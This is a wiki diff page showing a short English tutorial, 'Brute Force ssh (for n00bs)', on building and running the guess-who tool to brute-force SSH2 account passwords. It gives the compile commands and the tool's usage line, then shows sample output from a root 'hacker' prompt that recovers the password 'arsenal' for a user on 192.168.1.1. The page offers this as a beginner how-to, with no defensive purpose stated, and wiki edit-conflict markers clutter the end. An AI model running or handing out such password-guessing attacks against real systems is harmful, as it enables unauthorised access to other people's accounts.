Italiano English
Modifica History Actions

Differenze per "BruteForce_ssh_eng"

Differenze tra le versioni 6 e 7
Versione 6 del 2007-06-04 11:33:15
Dimensione: 2458
Autore: ClauzClauz
Commento:
Versione 7 del 2007-06-04 11:33:29
Dimensione: 2639
Autore: ClauzClauz
Commento: added to CategoryEnglishPages
Le cancellazioni sono segnalate in questo modo. Le aggiunte sono segnalate in questo modo.
Linea 51: Linea 51:
---- /!\ '''Edit conflict - other version:''' ----
Linea 53: Linea 55:

---- /!\ '''Edit conflict - your version:''' ----

----
CategoryEnglishPages

---- /!\ '''End of edit conflict''' ----

Brute Force ssh (for n00bs)

Guess-who is a password brute force utility for attacking Secure Shell Version 2 accounts. BR It is available from http://packetstormsecurity.org/ BR

Required Files and programs

It is NOT required to download ALL files here. Please read CAREFULLY! BR

BR

Procedure

Installation: BR Download to the desired directory BR

tar -zxvf guess-who-0.44.tgz
make

BR Execution: BR

[root@hacker guess-who]# ./b

guess-who SSH2 parallel passwd bruter (C) 2002 by krahmer@cs.uni-potsdam.de

Usage: ./b <-l login> <-h host> [-p port] <-1|-2> [-N nthreads] [-n ntries]
Use -1 for producer/consumer thread model, -2 for dumb parallelism. < Password file

Expected output: BR

[root@hacker guess-who]# ./b -l kev -h l192.168.1.1 -p 22 -2 < /passwords.txt
(!)056 ][ 00013 ][ 00000004.307361 ][ kev ][ arsenal ]
[ 00061 ][ 00015 ][ 00000004.066396 ][ kev ][ e3d ]

As you can see the user kev has a password of arsenal BR


/!\ Edit conflict - other version:



CategoryEnglishPages


/!\ Edit conflict - your version:



CategoryEnglishPages


/!\ End of edit conflict